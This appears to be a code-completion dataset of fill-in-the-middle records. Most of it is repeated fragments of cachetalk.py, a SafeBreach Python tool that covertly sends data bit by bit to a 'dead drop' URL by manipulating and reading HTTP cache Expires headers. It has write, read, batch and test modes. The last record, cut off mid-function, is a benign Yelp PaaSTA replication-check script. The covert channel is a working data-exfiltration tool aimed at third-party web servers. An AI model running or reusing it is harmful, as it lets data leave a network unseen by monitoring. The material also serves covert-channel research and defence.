group.add_argument('-w', '--write', nargs=1, type=str, metavar='DATA', help='connect to URL and write DATA')
group.add_argument('-r', '--read', nargs=1, type=int, metavar='LEN', help='monitor URL and read LEN amount of bits')
group.add_argument('-t', '--test', action='store_true', help='print HTTP Server Expires and calculate the delta')
group.add_argument('-b', '--batch', nargs=2, type=str, metavar=('FILE.CSV', 'R|W'), help='In batch mode you can supply a file with a list of URLs, DELTAs, and 1/0\'s')
args = parser.parse_args(args=args[1:])
if not args.url.startswith('http'):
args.url = 'http://' + args.url
if args.verbose:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)))
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(debuglevel=1)))
req_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
req = urllib2.Request(args.url, headers=req_headers)
if args.batch:
print "START BATCH MODE"
pool = multiprocessing.pool.ThreadPool(processes=8)
threads = []
batch_mode = args.batch[1].lower()
results = []
with open(args.batch[0], 'r') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
batch_argv = [sys.argv[0], '-1', '-s']
if batch_mode == 'r':
batch_argv.append('-r 1')
else:
batch_argv.append('-w0b' + row[2])
batch_argv.append(row[0])
batch_argv.append(row[1])
print "Calling Thread w/ %s" % (batch_argv[1:])
threads.append(pool.apply_async(main,(batch_argv,)))
for result in threads:
results.append(result.get())
# That's what happened when you commit code the night before the talk ;-)
results = reduce(lambda x,y: x+y, map(lambda x: str(x), reduce(lambda x,y: x+y, results)))
print "END OF BATCH MODE\n\n"
print ">>> RESULT: %s <<<" % results
elif args.test:
# Test-mode
try:
http_response = urllib2.urlopen(req)
http_response.read()
print '\n' + args.url + ':'
print "=" * (len(args.url) + 1) + '\n'
print "Expires equal to: %s" % http_response.headers['Expires']
print "Date equal to: %s\n" % http_response.headers['Date']
# Every hit changes Expires? Can't use URL for cache talking ...
if http_response.headers['Expires'] == http_response.headers['Date']:
print "NOT GOOD!"
else:
print "MAYBE ... (DELTA equals %s)" % __calc_delta(http_response.headers['Expires'],
http_response.headers['Date'])
except TypeError:
# expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
# TypeError: 'NoneType' object has no attribute '__getitem__'
print "`Expires' Value is Number and not a Date! Can't calculate delta ...\n"
except KeyError:
# Maybe it's not Expires?
print "Can't find `Expires' Header in HTTP Response ...\n"
except urllib2.HTTPError as e:
# Connection error
print "ERROR: %s for %s" % (str(e), args.url)
else:
# Write/Read Mode
first_sync = args.force_start
bits = []
if not args.read:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- INPUT (%s) ---" % args.write[0]
print ''.join(bits)
print "--- INPUT = %d BITS --" % (len(bits))
initial_poll_interval = args.poll_interval
last_input_bit = -1
last_poll_interval = -1
after_fp = False
sliding_delta = 0
if args.read:
if args.poll_interval < 11:
sliding_delta = 1
else:
sliding_delta = 10
args.poll_interval = args.poll_interval + sliding_delta
while True:
if not first_sync or args.always_sync:
if not args.quiet:
print "[%s]: Synchronizing ..." % time.asctime()
__wait_till_next_minute()
first_sync = True
print "[%s]: Synchronized! Need to sleep another %d second(s) ..." % (time.asctime(), args.poll_interval)
time.sleep(args.poll_interval)
print "[%s]: Work time!" % time.asctime()
observed_delta = None
if args.read:
# Read, append bit to bits array depends on the HTTP response
input_bit = 0
http_response = urllib2.urlopen(req)
http_response.read()
# Negative delta? (Minus sliding_delta, as read interval is always + sliding_delta to give the writer a buffer)
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
if observed_delta.total_seconds() < args.poll_interval - sliding_delta:
input_bit = 1
print "(READING | R#: %d | E: %s | D: %s | D2: %s): BIT %d" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds(), input_bit)
if last_input_bit == 0 and input_bit == 1 and last_poll_interval == observed_delta.total_seconds():
args.poll_interval = observed_delta.total_seconds()
print "*** FALSE POSITIVE! (Ignored; Changed to 0)"
bits.append(0)
last_input_bit = 0
after_fp = True
else:
args.poll_interval = observed_delta.total_seconds() + (sliding_delta + 1)
if after_fp:
# After False-positive and bit 1? Writer back online!
|
bits.append(input_bit)
last_input_bit = input_bit
last_poll_interval = args.poll_interval - (sliding_delta + 1)
if len(bits) == args.read[0]:
break
else:
# Write, pop bit form the bits array
try:
output_bit = bits.pop()
if output_bit == '0':
print "(WRITING | R#: =OFFLINE= | E: =OFFLINE= | D: =OFFLINE=): BIT 0"
if len(bits) == 0:
break
continue
while True:
http_response = urllib2.urlopen(req)
http_response.read()
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
print "(WRITING | R#: %d | E: %s | D: %s | D2: %s): BIT 1" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds())
if observed_delta.total_seconds() != args.poll_interval and not args.try_once:
print "*** RETRY!"
retry_sleep = observed_delta.total_seconds()
if retry_sleep == 0:
retry_sleep = 1
time.sleep(retry_sleep)
continue
# Do-while Writer is not aligned w/ Expires
break
if len(bits) == 0:
break
except IndexError:
break
if not args.quiet:
print "!!! EOF !!!"
if not bits:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- OUTPUT ---"
print ''.join(map(str, bits))
print "--- OUTPUT = %d BITS --" % (len(bits))
print " "
n = int(''.join(map(str, bits)), 2)
try:
print binascii.unhexlify('%x' % n)
except TypeError:
# TypeError: Odd-length string if n = 0 or 1
if len(bits) == 1:
pass
else:
raise
return bits
###############
# Entry Point #
###############
if __name__ == "__main__":
sys.exit(main(sys.argv))
| if input_bit == 1:
after_fp = False
else:
# After False-positive and bit 0? It's still False-positive ... Go back to original cycle!
args.poll_interval = initial_poll_interval | conditional_block |
cachetalk.py | #!/usr/bin/env python
# Copyright (c) 2016, SafeBreach
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import urllib2
import argparse
import time
import datetime
import email.utils
import binascii
import csv
import multiprocessing.pool
####################
# Global Variables #
####################
__version__ = "1.0"
__author__ = "Itzik Kotler"
__copyright__ = "Copyright 2016, SafeBreach"
#############
# Functions #
#############
def __wait_till_next_minute():
sleeptime = 60 - datetime.datetime.utcnow().second
time.sleep(sleeptime)
def __calc_delta(expires_field, date_field):
now_date = datetime.datetime(*email.utils.parsedate(date_field)[:6])
expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
return expires_date - now_date
def __str2bits(string):
bits = []
if string.startswith('0b'):
bits = list(string[2:])
else:
# Convert text to binary, use the str repr to convert to list, skip 2 bytes to jump over '0b' prefix
bits = list(bin(int(binascii.hexlify(string), 16)))[2:]
# We're using .pop() so it's reverse() the order of the list
bits.reverse()
return bits
def main(args):
|
###############
# Entry Point #
###############
if __name__ == "__main__":
sys.exit(main(sys.argv))
| parser = argparse.ArgumentParser(prog='cachetalk')
parser.add_argument('url', metavar='URL', type=str, help='dead drop URL')
parser.add_argument('poll_interval', metavar='SECONDS', nargs='?', type=int,
help='polling intervals (i.e. the delta)')
parser.add_argument('-s', '--always-sync', action='store_true', help='always start on the top of the minute')
parser.add_argument('-f', '--force-start', action='store_true', help='start immediately without synchronizing')
parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')
parser.add_argument('-q', '--quiet', action='store_true', help='less output')
parser.add_argument('-1', '--try-once', action='store_true', help='try to write once and stop')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-w', '--write', nargs=1, type=str, metavar='DATA', help='connect to URL and write DATA')
group.add_argument('-r', '--read', nargs=1, type=int, metavar='LEN', help='monitor URL and read LEN amount of bits')
group.add_argument('-t', '--test', action='store_true', help='print HTTP Server Expires and calculate the delta')
group.add_argument('-b', '--batch', nargs=2, type=str, metavar=('FILE.CSV', 'R|W'), help='In batch mode you can supply a file with a list of URLs, DELTAs, and 1/0\'s')
args = parser.parse_args(args=args[1:])
if not args.url.startswith('http'):
args.url = 'http://' + args.url
if args.verbose:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)))
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(debuglevel=1)))
req_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
req = urllib2.Request(args.url, headers=req_headers)
if args.batch:
print "START BATCH MODE"
pool = multiprocessing.pool.ThreadPool(processes=8)
threads = []
batch_mode = args.batch[1].lower()
results = []
with open(args.batch[0], 'r') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
batch_argv = [sys.argv[0], '-1', '-s']
if batch_mode == 'r':
batch_argv.append('-r 1')
else:
batch_argv.append('-w0b' + row[2])
batch_argv.append(row[0])
batch_argv.append(row[1])
print "Calling Thread w/ %s" % (batch_argv[1:])
threads.append(pool.apply_async(main,(batch_argv,)))
for result in threads:
results.append(result.get())
# That's what happened when you commit code the night before the talk ;-)
results = reduce(lambda x,y: x+y, map(lambda x: str(x), reduce(lambda x,y: x+y, results)))
print "END OF BATCH MODE\n\n"
print ">>> RESULT: %s <<<" % results
elif args.test:
# Test-mode
try:
http_response = urllib2.urlopen(req)
http_response.read()
print '\n' + args.url + ':'
print "=" * (len(args.url) + 1) + '\n'
print "Expires equal to: %s" % http_response.headers['Expires']
print "Date equal to: %s\n" % http_response.headers['Date']
# Every hit changes Expires? Can't use URL for cache talking ...
if http_response.headers['Expires'] == http_response.headers['Date']:
print "NOT GOOD!"
else:
print "MAYBE ... (DELTA equals %s)" % __calc_delta(http_response.headers['Expires'],
http_response.headers['Date'])
except TypeError:
# expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
# TypeError: 'NoneType' object has no attribute '__getitem__'
print "`Expires' Value is Number and not a Date! Can't calculate delta ...\n"
except KeyError:
# Maybe it's not Expires?
print "Can't find `Expires' Header in HTTP Response ...\n"
except urllib2.HTTPError as e:
# Connection error
print "ERROR: %s for %s" % (str(e), args.url)
else:
# Write/Read Mode
first_sync = args.force_start
bits = []
if not args.read:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- INPUT (%s) ---" % args.write[0]
print ''.join(bits)
print "--- INPUT = %d BITS --" % (len(bits))
initial_poll_interval = args.poll_interval
last_input_bit = -1
last_poll_interval = -1
after_fp = False
sliding_delta = 0
if args.read:
if args.poll_interval < 11:
sliding_delta = 1
else:
sliding_delta = 10
args.poll_interval = args.poll_interval + sliding_delta
while True:
if not first_sync or args.always_sync:
if not args.quiet:
print "[%s]: Synchronizing ..." % time.asctime()
__wait_till_next_minute()
first_sync = True
print "[%s]: Synchronized! Need to sleep another %d second(s) ..." % (time.asctime(), args.poll_interval)
time.sleep(args.poll_interval)
print "[%s]: Work time!" % time.asctime()
observed_delta = None
if args.read:
# Read, append bit to bits array depends on the HTTP response
input_bit = 0
http_response = urllib2.urlopen(req)
http_response.read()
# Negative delta? (Minus sliding_delta, as read interval is always + sliding_delta to give the writer a buffer)
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
if observed_delta.total_seconds() < args.poll_interval - sliding_delta:
input_bit = 1
print "(READING | R#: %d | E: %s | D: %s | D2: %s): BIT %d" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds(), input_bit)
if last_input_bit == 0 and input_bit == 1 and last_poll_interval == observed_delta.total_seconds():
args.poll_interval = observed_delta.total_seconds()
print "*** FALSE POSITIVE! (Ignored; Changed to 0)"
bits.append(0)
last_input_bit = 0
after_fp = True
else:
args.poll_interval = observed_delta.total_seconds() + (sliding_delta + 1)
if after_fp:
# After False-positive and bit 1? Writer back online!
if input_bit == 1:
after_fp = False
else:
# After False-positive and bit 0? It's still False-positive ... Go back to original cycle!
args.poll_interval = initial_poll_interval
bits.append(input_bit)
last_input_bit = input_bit
last_poll_interval = args.poll_interval - (sliding_delta + 1)
if len(bits) == args.read[0]:
break
else:
# Write, pop bit form the bits array
try:
output_bit = bits.pop()
if output_bit == '0':
print "(WRITING | R#: =OFFLINE= | E: =OFFLINE= | D: =OFFLINE=): BIT 0"
if len(bits) == 0:
break
continue
while True:
http_response = urllib2.urlopen(req)
http_response.read()
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
print "(WRITING | R#: %d | E: %s | D: %s | D2: %s): BIT 1" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds())
if observed_delta.total_seconds() != args.poll_interval and not args.try_once:
print "*** RETRY!"
retry_sleep = observed_delta.total_seconds()
if retry_sleep == 0:
retry_sleep = 1
time.sleep(retry_sleep)
continue
# Do-while Writer is not aligned w/ Expires
break
if len(bits) == 0:
break
except IndexError:
break
if not args.quiet:
print "!!! EOF !!!"
if not bits:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- OUTPUT ---"
print ''.join(map(str, bits))
print "--- OUTPUT = %d BITS --" % (len(bits))
print " "
n = int(''.join(map(str, bits)), 2)
try:
print binascii.unhexlify('%x' % n)
except TypeError:
# TypeError: Odd-length string if n = 0 or 1
if len(bits) == 1:
pass
else:
raise
return bits | identifier_body |
cachetalk.py | #!/usr/bin/env python
# Copyright (c) 2016, SafeBreach
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import urllib2
import argparse
import time
import datetime
import email.utils
import binascii
import csv
import multiprocessing.pool
####################
# Global Variables #
####################
__version__ = "1.0"
__author__ = "Itzik Kotler"
__copyright__ = "Copyright 2016, SafeBreach"
#############
# Functions #
#############
def __wait_till_next_minute():
sleeptime = 60 - datetime.datetime.utcnow().second
time.sleep(sleeptime)
def __calc_delta(expires_field, date_field):
now_date = datetime.datetime(*email.utils.parsedate(date_field)[:6])
expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
return expires_date - now_date
def | (string):
bits = []
if string.startswith('0b'):
bits = list(string[2:])
else:
# Convert text to binary, use the str repr to convert to list, skip 2 bytes to jump over '0b' prefix
bits = list(bin(int(binascii.hexlify(string), 16)))[2:]
# We're using .pop() so it's reverse() the order of the list
bits.reverse()
return bits
def main(args):
parser = argparse.ArgumentParser(prog='cachetalk')
parser.add_argument('url', metavar='URL', type=str, help='dead drop URL')
parser.add_argument('poll_interval', metavar='SECONDS', nargs='?', type=int,
help='polling intervals (i.e. the delta)')
parser.add_argument('-s', '--always-sync', action='store_true', help='always start on the top of the minute')
parser.add_argument('-f', '--force-start', action='store_true', help='start immediately without synchronizing')
parser.add_argument('-v', '--verbose', action='store_true', help='verbose output')
parser.add_argument('-q', '--quiet', action='store_true', help='less output')
parser.add_argument('-1', '--try-once', action='store_true', help='try to write once and stop')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-w', '--write', nargs=1, type=str, metavar='DATA', help='connect to URL and write DATA')
group.add_argument('-r', '--read', nargs=1, type=int, metavar='LEN', help='monitor URL and read LEN amount of bits')
group.add_argument('-t', '--test', action='store_true', help='print HTTP Server Expires and calculate the delta')
group.add_argument('-b', '--batch', nargs=2, type=str, metavar=('FILE.CSV', 'R|W'), help='In batch mode you can supply a file with a list of URLs, DELTAs, and 1/0\'s')
args = parser.parse_args(args=args[1:])
if not args.url.startswith('http'):
args.url = 'http://' + args.url
if args.verbose:
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPHandler(debuglevel=1)))
urllib2.install_opener(urllib2.build_opener(urllib2.HTTPSHandler(debuglevel=1)))
req_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36'}
req = urllib2.Request(args.url, headers=req_headers)
if args.batch:
print "START BATCH MODE"
pool = multiprocessing.pool.ThreadPool(processes=8)
threads = []
batch_mode = args.batch[1].lower()
results = []
with open(args.batch[0], 'r') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
batch_argv = [sys.argv[0], '-1', '-s']
if batch_mode == 'r':
batch_argv.append('-r 1')
else:
batch_argv.append('-w0b' + row[2])
batch_argv.append(row[0])
batch_argv.append(row[1])
print "Calling Thread w/ %s" % (batch_argv[1:])
threads.append(pool.apply_async(main,(batch_argv,)))
for result in threads:
results.append(result.get())
# That's what happened when you commit code the night before the talk ;-)
results = reduce(lambda x,y: x+y, map(lambda x: str(x), reduce(lambda x,y: x+y, results)))
print "END OF BATCH MODE\n\n"
print ">>> RESULT: %s <<<" % results
elif args.test:
# Test-mode
try:
http_response = urllib2.urlopen(req)
http_response.read()
print '\n' + args.url + ':'
print "=" * (len(args.url) + 1) + '\n'
print "Expires equal to: %s" % http_response.headers['Expires']
print "Date equal to: %s\n" % http_response.headers['Date']
# Every hit changes Expires? Can't use URL for cache talking ...
if http_response.headers['Expires'] == http_response.headers['Date']:
print "NOT GOOD!"
else:
print "MAYBE ... (DELTA equals %s)" % __calc_delta(http_response.headers['Expires'],
http_response.headers['Date'])
except TypeError:
# expires_date = datetime.datetime(*email.utils.parsedate(expires_field)[:6])
# TypeError: 'NoneType' object has no attribute '__getitem__'
print "`Expires' Value is Number and not a Date! Can't calculate delta ...\n"
except KeyError:
# Maybe it's not Expires?
print "Can't find `Expires' Header in HTTP Response ...\n"
except urllib2.HTTPError as e:
# Connection error
print "ERROR: %s for %s" % (str(e), args.url)
else:
# Write/Read Mode
first_sync = args.force_start
bits = []
if not args.read:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- INPUT (%s) ---" % args.write[0]
print ''.join(bits)
print "--- INPUT = %d BITS --" % (len(bits))
initial_poll_interval = args.poll_interval
last_input_bit = -1
last_poll_interval = -1
after_fp = False
sliding_delta = 0
if args.read:
if args.poll_interval < 11:
sliding_delta = 1
else:
sliding_delta = 10
args.poll_interval = args.poll_interval + sliding_delta
while True:
if not first_sync or args.always_sync:
if not args.quiet:
print "[%s]: Synchronizing ..." % time.asctime()
__wait_till_next_minute()
first_sync = True
print "[%s]: Synchronized! Need to sleep another %d second(s) ..." % (time.asctime(), args.poll_interval)
time.sleep(args.poll_interval)
print "[%s]: Work time!" % time.asctime()
observed_delta = None
if args.read:
# Read, append bit to bits array depends on the HTTP response
input_bit = 0
http_response = urllib2.urlopen(req)
http_response.read()
# Negative delta? (Minus sliding_delta, as read interval is always + sliding_delta to give the writer a buffer)
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
if observed_delta.total_seconds() < args.poll_interval - sliding_delta:
input_bit = 1
print "(READING | R#: %d | E: %s | D: %s | D2: %s): BIT %d" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds(), input_bit)
if last_input_bit == 0 and input_bit == 1 and last_poll_interval == observed_delta.total_seconds():
args.poll_interval = observed_delta.total_seconds()
print "*** FALSE POSITIVE! (Ignored; Changed to 0)"
bits.append(0)
last_input_bit = 0
after_fp = True
else:
args.poll_interval = observed_delta.total_seconds() + (sliding_delta + 1)
if after_fp:
# After False-positive and bit 1? Writer back online!
if input_bit == 1:
after_fp = False
else:
# After False-positive and bit 0? It's still False-positive ... Go back to original cycle!
args.poll_interval = initial_poll_interval
bits.append(input_bit)
last_input_bit = input_bit
last_poll_interval = args.poll_interval - (sliding_delta + 1)
if len(bits) == args.read[0]:
break
else:
# Write, pop bit form the bits array
try:
output_bit = bits.pop()
if output_bit == '0':
print "(WRITING | R#: =OFFLINE= | E: =OFFLINE= | D: =OFFLINE=): BIT 0"
if len(bits) == 0:
break
continue
while True:
http_response = urllib2.urlopen(req)
http_response.read()
observed_delta = __calc_delta(http_response.headers['Expires'], http_response.headers['Date'])
print "(WRITING | R#: %d | E: %s | D: %s | D2: %s): BIT 1" % (
http_response.getcode(), http_response.headers['Expires'], http_response.headers['Date'],
observed_delta.total_seconds())
if observed_delta.total_seconds() != args.poll_interval and not args.try_once:
print "*** RETRY!"
retry_sleep = observed_delta.total_seconds()
if retry_sleep == 0:
retry_sleep = 1
time.sleep(retry_sleep)
continue
# Do-while Writer is not aligned w/ Expires
break
if len(bits) == 0:
break
except IndexError:
break
if not args.quiet:
print "!!! EOF !!!"
if not bits:
bits = __str2bits(args.write[0])
if not args.quiet:
print "--- OUTPUT ---"
print ''.join(map(str, bits))
print "--- OUTPUT = %d BITS --" % (len(bits))
print " "
n = int(''.join(map(str, bits)), 2)
try:
print binascii.unhexlify('%x' % n)
except TypeError:
# TypeError: Odd-length string if n = 0 or 1
if len(bits) == 1:
pass
else:
raise
return bits
###############
# Entry Point #
###############
if __name__ == "__main__":
sys.exit(main(sys.argv))
| __str2bits | identifier_name |
check_marathon_services_replication.py | #!/usr/bin/env python
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage: ./check_marathon_services_replication.py [options]
This is a script that checks the number of HAProxy backends via Synapse against
the expected amount that should've been deployed via Marathon in a mesos cluster.
Basically, the script checks smartstack.yaml for listed namespaces, and then queries
Synapse for the number of available backends for that namespace. It then goes through
the Marathon service configuration file for that cluster, and sees how many instances
are expected to be available for that namespace based on the number of instances deployed
on that namespace.
After retrieving that information, a fraction of available instances is calculated
(available/expected), and then compared against a threshold. The default threshold is
50, meaning if less than 50% of a service's backends are available, the script sends
CRITICAL. If replication_threshold is defined in the yelpsoa config for a service
instance then it will be used instead.
"""
import argparse
import logging
import os
from datetime import datetime
from datetime import timedelta
import a_sync
import pysensu_yelp
from paasta_tools import marathon_tools
from paasta_tools import monitoring_tools
from paasta_tools.marathon_tools import format_job_id
from paasta_tools.mesos_tools import get_slaves
from paasta_tools.paasta_service_config_loader import PaastaServiceConfigLoader
from paasta_tools.smartstack_tools import SmartstackReplicationChecker
from paasta_tools.utils import _log
from paasta_tools.utils import datetime_from_utc_to_local
from paasta_tools.utils import DEFAULT_SOA_DIR
from paasta_tools.utils import is_under_replicated
from paasta_tools.utils import load_system_paasta_config
log = logging.getLogger(__name__)
def send_event(instance_config, status, output):
"""Send an event to sensu via pysensu_yelp with the given information.
:param instance_config: an instance of MarathonServiceConfig
:param status: The status to emit for this event
:param output: The output to emit for this event"""
# This function assumes the input is a string like "mumble.main"
monitoring_overrides = instance_config.get_monitoring()
if 'alert_after' not in monitoring_overrides:
monitoring_overrides['alert_after'] = '2m'
monitoring_overrides['check_every'] = '1m'
monitoring_overrides['runbook'] = monitoring_tools.get_runbook(
monitoring_overrides,
instance_config.service, soa_dir=instance_config.soa_dir,
)
check_name = (
'check_marathon_services_replication.%s' %
instance_config.job_id
)
monitoring_tools.send_event(
service=instance_config.service,
check_name=check_name,
overrides=monitoring_overrides,
status=status,
output=output,
soa_dir=instance_config.soa_dir,
cluster=instance_config.cluster,
)
_log(
service=instance_config.service,
line='Replication: %s' % output,
component='monitoring',
level='debug',
cluster=instance_config.cluster,
instance=instance_config.instance,
)
def parse_args():
epilog = "PERCENTAGE is an integer value representing the percentage of available to expected instances"
parser = argparse.ArgumentParser(epilog=epilog)
parser.add_argument(
'-d', '--soa-dir', dest="soa_dir", metavar="SOA_DIR",
default=DEFAULT_SOA_DIR,
help="define a different soa config directory",
)
parser.add_argument(
'-v', '--verbose', action='store_true',
dest="verbose", default=False,
)
options = parser.parse_args()
return options
def check_smartstack_replication_for_instance(
instance_config,
expected_count,
smartstack_replication_checker,
):
"""Check a set of namespaces to see if their number of available backends is too low,
emitting events to Sensu based on the fraction available and the thresholds defined in
the corresponding yelpsoa config.
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
crit_threshold = instance_config.get_replication_crit_percentage()
log.info('Checking instance %s in smartstack', instance_config.job_id)
smartstack_replication_info = \
smartstack_replication_checker.get_replication_for_instance(instance_config)
log.debug('Got smartstack replication info for %s: %s' %
(instance_config.job_id, smartstack_replication_info))
if len(smartstack_replication_info) == 0:
status = pysensu_yelp.Status.CRITICAL
output = (
'Service %s has no Smartstack replication info. Make sure the discover key in your smartstack.yaml '
'is valid!\n'
) % instance_config.job_id
log.error(output)
else:
|
send_event(instance_config=instance_config, status=status, output=output)
def filter_healthy_marathon_instances_for_short_app_id(all_tasks, app_id):
tasks_for_app = [task for task in all_tasks if task.app_id.startswith('/%s' % app_id)]
one_minute_ago = datetime.now() - timedelta(minutes=1)
healthy_tasks = []
for task in tasks_for_app:
if marathon_tools.is_task_healthy(task, default_healthy=True) \
and task.started_at is not None \
and datetime_from_utc_to_local(task.started_at) < one_minute_ago:
healthy_tasks.append(task)
return len(healthy_tasks)
def check_healthy_marathon_tasks_for_service_instance(
instance_config,
expected_count,
all_tasks,
):
app_id = format_job_id(instance_config.service, instance_config.instance)
num_healthy_tasks = filter_healthy_marathon_instances_for_short_app_id(
all_tasks=all_tasks,
app_id=app_id,
)
log.info("Checking %s in marathon as it is not in smartstack" % app_id)
send_event_if_under_replication(
instance_config=instance_config,
expected_count=expected_count,
num_available=num_healthy_tasks,
)
def send_event_if_under_replication(
instance_config,
expected_count,
num_available,
):
crit_threshold = instance_config.get_replication_crit_percentage()
output = (
'Service %s has %d out of %d expected instances available!\n' +
'(threshold: %d%%)'
) % (instance_config.job_id, num_available, expected_count, crit_threshold)
under_replicated, _ = is_under_replicated(num_available, expected_count, crit_threshold)
if under_replicated:
output += (
"\n\n"
"What this alert means:\n"
"\n"
" This replication alert means that the service PaaSTA can't keep the\n"
" requested number of copies up and healthy in the cluster.\n"
"\n"
"Reasons this might be happening:\n"
"\n"
" The service may simply unhealthy. There also may not be enough resources\n"
" in the cluster to support the requested instance count.\n"
"\n"
"Things you can do:\n"
"\n"
" * Increase the instance count\n"
" * Fix the cause of the unhealthy service. Try running:\n"
"\n"
" paasta status -s %(service)s -i %(instance)s -c %(cluster)s -vv\n"
) % {
'service': instance_config.service,
'instance': instance_config.instance,
'cluster': instance_config.cluster,
}
log.error(output)
status = pysensu_yelp.Status.CRITICAL
else:
log.info(output)
status = pysensu_yelp.Status.OK
send_event(
instance_config=instance_config,
status=status,
output=output,
)
def check_service_replication(
instance_config,
all_tasks,
smartstack_replication_checker,
):
"""Checks a service's replication levels based on how the service's replication
should be monitored. (smartstack or mesos)
:param instance_config: an instance of MarathonServiceConfig
:param smartstack_replication_checker: an instance of SmartstackReplicationChecker
"""
expected_count = instance_config.get_instances()
log.info("Expecting %d total tasks for %s" % (expected_count, instance_config.job_id))
proxy_port = marathon_tools.get_proxy_port_for_instance(
name=instance_config.service,
instance=instance_config.instance,
cluster=instance_config.cluster,
soa_dir=instance_config.soa_dir,
)
registrations = instance_config.get_registrations()
# if the primary registration does not match the service_instance name then
